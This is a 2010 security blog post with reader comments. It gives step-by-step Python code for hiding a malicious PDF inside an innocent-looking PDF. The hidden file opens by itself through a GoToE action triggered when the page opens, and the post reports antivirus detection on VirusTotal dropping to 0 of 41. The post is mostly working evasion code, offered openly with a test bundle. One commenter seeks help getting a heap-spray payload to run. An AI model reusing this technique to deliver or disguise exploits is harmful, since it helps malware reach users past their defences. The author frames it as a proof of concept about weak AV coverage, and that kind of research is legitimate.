Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010)

January 13, 2010


This post is about hiding an evil PDF inside an innocent-looking PDF. The objective is to embed a pdf into another pdf, and make the reader parse the embedded one without user intervention. If we manage to do this we’ll be able to ‘filter’ the embedded file and hide it behind some pdf encoding filters (FlateDecode, Crypt, etc.), making it invisible from the outside. Finally, as we’ll be using miniPDF.py, we’ll pass everything through the (unfinished) obfuscated version of the miniPDF.py lib, here.


Hey! But, can we embed files into a PDF at all? Well as stated here …

PDF32000:2008::7.11.4 Embedded File Streams

If a PDF file contains file specifications that refer to an external file and the PDF file is archived or transmitted, some provision should be made to make sure that the external references will remain valid. One way to do this is to arrange for copies of the external files to accompany the PDF file. Embedded file streams (PDF 1.3) address this problem by allowing the contents of referenced files to be embedded directly within the body of the PDF file. This makes the PDF file a self-contained unit that can be stored or transmitted as a single entity. (The embedded files are included purely for convenience and need not be directly processed by any conforming reader.)

.. YES we can. There are probably other ways to embed files, as in the relatively new PDF ‘collection’ thing, but that’s another story.

I) Embed a PDF into a PDF

OK, let’s start! The first thing we need is a clean PDF to hide. It needs to be one with a correct xref and a clean overall file structure. So, for a start we hide a good pdf, then we’ll see how to embed a bad one. There is a clean, minimalistic, text-displaying pdf generated in this post, the pdf here.

Now we need to construct the host pdf. We are not really interested in putting anything in it, so let’s construct an empty pdf (mostly as done for the JS-to_PDF post, here).

As in the earlier post first we import the lib and create a PDFDoc object representing a document in memory …

from miniPDF import *
#The PDF document
doc= PDFDoc()

Prepare the Pages dictionary, which is in charge of linking to the pages…

pages = PDFDict()
pages.add('Type', PDFName('Pages'))
doc.add(pages)

Prepare the Catalog dictionary.

catalog = PDFDict()
catalog.add('Type', PDFName('Catalog'))
catalog.add('Pages', PDFRef(pages))
doc.add(catalog)

The Catalog dictionary is the main root object of the PDF…

doc.setRoot(catalog)

We don’t really need any content on our pdf hosting PDF.
We add an empty content for the dummy page,

contents = PDFStream('')
doc.add(contents)

and the single dummy page. Note that we NEED to honor the Parent link to the Pages dictionary, otherwise our magic won’t work.

page = PDFDict()
page.add('Type', PDFName('Page'))
page.add('Parent', PDFRef(pages))
page.add('Contents', PDFRef(contents)) #<- NEEDED!
doc.add(page)

And finally populate the pages dictionary.

#link the page to the pages list
pages.add('Kids', PDFArray([PDFRef(page)]))
pages.add('Count', PDFNum(1))

And with this ..

print doc

it renders the incomplete base PDF to the stdout. Something like this.

The incomplete pdf is here and the incomplete py, here. OK, we have an empty base pdf, now let’s ..

Insert an embedded file.

For this we need to

  1. add the EmbeddedFile stream containing the actual embedded file data,
  2. build a FileSpec dictionary for it,
  3. construct the EmbeddedFiles list and
  4. put that under the global names list in the Catalog.
(1) To add the EmbeddedFile stream to the document do something like this.

Get the filename to hide from the parameters, and load its content into memory…

import sys
fileStr = file(sys.argv[1], 'rb').read()  # read as binary so the bytes are kept untouched

Construct an EmbeddedFile stream dictionary as stated in PDF32000:2008.1::7.11.4 (Embedded File Streams)

import md5  # Python 2 module, needed for the CheckSum entry
ef = PDFStream(fileStr)
ef.add('Type', PDFName('EmbeddedFile'))
ef.add('Subtype', PDFName('application#2Fpdf'))
ef.add('Params', PDFDict({'Size': PDFNum(len(fileStr)),
                          'CheckSum': PDFOctalString(md5.new(fileStr).digest())}))
ef.add('DL', ' %d ' % len(fileStr))
doc.add(ef)  # the stream must be in the document so it can be referenced later

Note that the ‘Type’, ‘Subtype’ and ‘Params’ entries are not strictly necessary.

EXAMPLE: If we embed a file containing only “AAAA” the resulting EmbeddedFile stream will look like…

N 0 obj
<<
  /Type /EmbeddedFile
  /Subtype /application#2Fpdf
  /DL  4
  /Length 4
  /Params <<  /CheckSum (\256\133\106\214\16707\241\363\323...
              /Size 4
          >>
>>
stream
AAAA
endstream
endobj
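The Subtype name and the Params values in that example can be reproduced without miniPDF. What follows is only a minimal Python 3 sketch under my own assumptions: `pdf_name` and `embedded_file_params` are hypothetical helper names, not part of miniPDF.py. It shows why the MIME type is written as application#2Fpdf (the slash is a delimiter, so inside a PDF name it has to be written as #2F) and how Size and the MD5 CheckSum are derived from the raw bytes.

```python
import hashlib

def pdf_name(text):
    """Render text as a PDF name, writing delimiter and non-printable bytes as #XX."""
    delimiters = b"()<>[]{}/%#"
    out = "/"
    for byte in text.encode("utf-8"):
        if byte < 0x21 or byte > 0x7E or byte in delimiters:
            out += "#%02X" % byte   # e.g. '/' becomes '#2F'
        else:
            out += chr(byte)
    return out

def embedded_file_params(data):
    """Return the values used for the Params sub-dictionary (hypothetical helper)."""
    return {"Size": len(data), "CheckSum": hashlib.md5(data).digest()}

print(pdf_name("application/pdf"))      # /application#2Fpdf
params = embedded_file_params(b"AAAA")
print(params["Size"])                   # 4
```

The CheckSum value is the 16 raw digest bytes; how they are escaped inside the PDF string (octal, hex, etc.) is up to whatever writes the file.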
(2) Now we’ll construct the FileSpec dictionary for it.

As stated in the rather confusing PDF32000:2008.1::7.11.3 (File Specification Dictionaries), a file specification dictionary for an embedded file needs to have these entries in it…

Key | Type | Value
Type | name | The type of PDF object that this dictionary describes; shall be Filespec for a file specification dictionary.
F | string | A file specification string of the form described in PDF32000:2008.1::7.11.2, “File Specification Strings.”
EF | dictionary | A dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. The value of each such key shall be an embedded file stream (see 7.11.4, “Embedded File Streams”) containing the corresponding file. If this entry is present, the Type entry is required and the file specification dictionary shall be indirectly referenced. The F and UF entries should be used in place of the DOS, Mac, or Unix entries.

So, my version of the FileSpec dictionary follows.

We need a dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. And then put that under the EF tag in the Filespec dictionary. Damn! This is confusing. Basically we need a dictionary that looks like this…

<< /F N 0 R  >>

Where “N 0 R” refers to the EmbeddedFile stream object. Here is the code…

embeddedlst = PDFDict()
embeddedlst.add('F', PDFRef(ef))

Let’s construct the actual Filespec dictionary. Note that I’ve hardcoded the name to ‘file.pdf’ and that this should be revisited if we are trying to embed more than one file.

filespec = PDFDict()
filespec.add('Type', PDFName('Filespec'))
filespec.add('F', PDFString('file.pdf'))
filespec.add('EF', embeddedlst)
doc.add(filespec)

Excellent!! We are getting closer to the ultimate PDF hider!! The Filespec dictionary will look like this…

M 0 obj
<< /Type /Filespec
     /F (file.pdf)
     /EF << /F N 0 R >>
>>
endobj
(3) Now we need to build the EmbeddedFiles list.

That’s easy, just build a dictionary that has a Names entry holding an array of pairs, each mapping a UTF-16 encoded name to a filespec dictionary. In short, it should be something like this…

<<
   /Names [<fffe610074007400610063006800> M 0 R]
>>

… where <fffe610074007400610063006800> is the utf-16 PDFHexString of the string “attach” and “M 0 R” is a reference to the filespec dictionary.
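To see where that hex string comes from, here is a small Python 3 sketch (the helper name `pdf_hex_string` is mine, it is not the miniPDF class). It spells the byte order out explicitly, because a plain 'utf-16' encode uses the machine’s native byte order; the string above is the little-endian form with its FF FE byte order mark. For comparison it also prints the big-endian form with the FE FF mark, which is the one the PDF specification describes for Unicode text strings.

```python
import codecs

def pdf_hex_string(data):
    """Render raw bytes as a PDF hexadecimal string (hypothetical helper)."""
    return "<" + data.hex() + ">"

name = "attach"

# Little-endian with BOM: the form shown in this post
little = codecs.BOM_UTF16_LE + name.encode("utf-16-le")
# Big-endian with BOM: the form described by the PDF spec for text strings
big = codecs.BOM_UTF16_BE + name.encode("utf-16-be")

print(pdf_hex_string(little))  # <fffe610074007400610063006800>
print(pdf_hex_string(big))     # <feff006100740074006100630068>
```

Whichever form is used, the bytes of the key in the EmbeddedFiles list and the bytes of the name used to look the file up later have to be identical.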

The code will be similar to this…

namesToFiles = PDFDict()
namesToFiles.add('Names', PDFArray([PDFHexString('attach'.encode('utf-16')), PDFRef(filespec)]))
(4) And finally we put it under the global names list in the Catalog.

We create the Names dictionary and add it to the document…

names = PDFDict()
doc.add(names)

… then add the EmbeddedFiles entry as stated in PDF32000:2008.1::7.7.4 (Name Dictionary). And finally link it from the Catalog.

names.add('EmbeddedFiles', namesToFiles)
catalog.add('Names', PDFRef(names))

WE HAVE EMBEDDED A FILE!!!

The still incomplete PDF with an embedded file containing “AAAA” is demonstrated here, and it actually has something under the ‘paper clip’, check it out …

II) Jump to the embedded PDF with GoToE

Now that we have added an embedded pdf to a pdf we’ll want to jump to it without user intervention and (why not) without javascript.

For this we’ll set up a GoToE action and link it to the OpenAction or some other trigger dictionary in the document.
An action dictionary defines the characteristics and behaviour of an action, and it is described in PDF32000:2008.1::12.6.2 (Action Dictionaries).

Embedded go-to actions give a complete facility for linking between a file in a hierarchy of nested embedded files and another file in the same or different hierarchy. The GoToE action is described in PDF32000:2008.1::12.6.4.4 (Embedded Go-To Actions), but basically it looks like this…

<<
  /S /GoToE
  /T <</N <fffe610074007400610063006800>
       /R /C
       /NewWindow false
     >>
  /NewWindow false
>>

…where the N tag refers to the utf-16 encoded name of the embedded file. The code for this action follows.

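# Same UTF-16 name that was used as the key in the EmbeddedFiles list
name = PDFHexString('attach'.encode('utf-16'))
action = PDFDict()
action.add('S', PDFName('GoToE'))
action.add('NewWindow', PDFBool(False))
action.add('T', PDFDict({'N': name, 'R': PDFName('C'), 'NewWindow': PDFBool(False)}))
doc.add(action)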

Setting the NewWindow tag to True or False may change how the reader opens the hidden file. Funny things may happen when run from inside a browser (!).

OK, all we have left is linking this action to some trigger that won’t attract the user’s attention.. well, we have OpenAction but let’s try something a lil different now. Let’s put one of those AA trigger dictionaries on the single dummy page of the host pdf. That’s done with something like this…

page.add('AA', PDFDict({'O': PDFRef(action)}))

And finally render it out to stdout…

print doc #:)

And since the script expects the pdf to hide as its first parameter.. we can use it like this…

python embeddPDF.py evil.pdf > goodness.pdf

For a quick look at a representative sample of this code, check here.
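A quick way to check that the generated file really contains the pieces described above is to look for their names in the raw bytes. This is only a rough Python 3 sketch of my own (the `find_markers` helper and the marker list are assumptions, not part of embeddPDF.py or miniPDF.py). It only sees names written in plain form, so it will miss anything written with #XX escapes or stored inside compressed streams.

```python
import re

# Names discussed in this post; each must not be followed by another letter,
# so that /EmbeddedFile does not also count /EmbeddedFiles.
MARKERS = [b"/EmbeddedFile", b"/EmbeddedFiles", b"/Filespec", b"/GoToE", b"/AA"]

def find_markers(pdf_bytes):
    """Count plain-text occurrences of each marker name in the raw PDF bytes."""
    counts = {}
    for marker in MARKERS:
        pattern = re.escape(marker) + rb"(?![A-Za-z0-9])"
        counts[marker.decode("ascii")] = len(re.findall(pattern, pdf_bytes))
    return counts

sample = (b"<< /Type /EmbeddedFile >> << /Names << /EmbeddedFiles 3 0 R >> >> "
          b"<< /S /GoToE >> << /AA << /O 7 0 R >> >>")
print(find_markers(sample))
```

To run it on a real file, read it in binary mode first, e.g. `find_markers(open('goodness.pdf', 'rb').read())`.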

III) The virustotal.com test

It’s time for the virustotal.com test. I’ll try to hide the evilness of some PDF by embedding it into one of our host PDFs, as described previously, and see what happens.

I’m tired so I’ll pick one not-so-evil pdf I got from my previous post. It is a small pdf with a javascript OpenAction featuring an obscene heap spray that is usually easily detected by AVs. It got this result on virustotal.com, a 14 out of 41 score.

Now let’s embed it with our embeddPDF.py… I got this pdf. When I passed it to virustotal.com it got detected by 2 of 41 AVs. Here you have the result. Damn! 0 out of 41 seems to be hard to get. Let’s try it again but this time using the obfuscated miniPDF.py version piled on the embeddPDF.py. I got this pdf. I passed it to virustotal… and got

-danger- !! 0/41 !! -danger-

No AV detected it!!

I suppose there are 1mill ways to accomplish this but it still feels g00d! The results here.

A complete test bundle with most of the code is here.

f/

UPDATE(5:19 AM Jan 17th) ::

Nice! We had an improvement! Now detected in 3/41 AVs. http://bit.ly/8Xabw4.


10 Responses to “Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010)”

  1. [...] fund targeted attacks, IE didn’t have multiple zero-day exploits, and a proof of concept embedded malicious PDF exploit had not just been released. Can you say ‘Beijing [...]

  2. dlimanov said

    Good research, but disabling JavaScript in Adobe (which everyone using Adobe should absolutely do) blocks it.

    • feliam said

      Disabling JavaScript disables nothing but javascript. Though, it will block javascript bugs and also exploits of any kind that use javascript for heapspray or for some memory massaging technique. But remember that really, really bad guys don’t use javascript for their exploits.
      In this Post I used JS just as a demo payload and not for the main functioning of the obfuscation.

  3. Robin said

    Just given this a try using the exploit PDF mentioned in the article and VirusTotal is giving me 16/41 for the embedded file vs 23/41 for the plain document so looks like the process still has some merit but is being detected by most of the major vendors now.

  4. dave said

    Hey feliam, forgive my ignorance if this is a stupid question, but did you ever actually get the javascript in the embedded pdf to execute? I’ve tried numerous times with just a simple js popup alert box, as well as a heap spray exploit with a calc spawn payload but had no luck. I tried it with pdfs I had created, as well as editing testx.pdf that you supplied (made sure to update the xref table as well) but still had no luck.

    Any chance you could point out where I’m going wrong? Cheers!

  5. Mihail said

    It is kinda pointless though – with the eyes of a former pro malware researcher – as AV engines will easily unpack all of your layers (embeddedfile, flatedecode). And ur 0/41 danger ratio is impressive, but did U check if it even worked? Same for 2/41, or your goal was just to put something-malicious-looking inside a PDF, and see how many scanners didnt notice it?

    • feliam said

      This is old now and I’m not sure if this particular technique still works. Probably adobe has stopped opening the embedded file from the OpenAction/GoToE action.
      In any case I wouldn’t go as far as saying they will ‘easily unpack’ every layer. They have to put together a complete parser that may handle all corner cases. Consider combining static filter/encryption, pdf actions, javascript, flash, xfa, xslt and xpath together. AV-zilla alert!

      3 years ago this worked like charm. I could put whatever inside and no AV reported anything.
      This was just a PoC showing that at that point bypassing AV was easy.
      My hypothesis: at any given time there are 2347896238946 ways of doing this in pdf and no AV will save you from targeted attacks. Nah, I’m probably wrong.
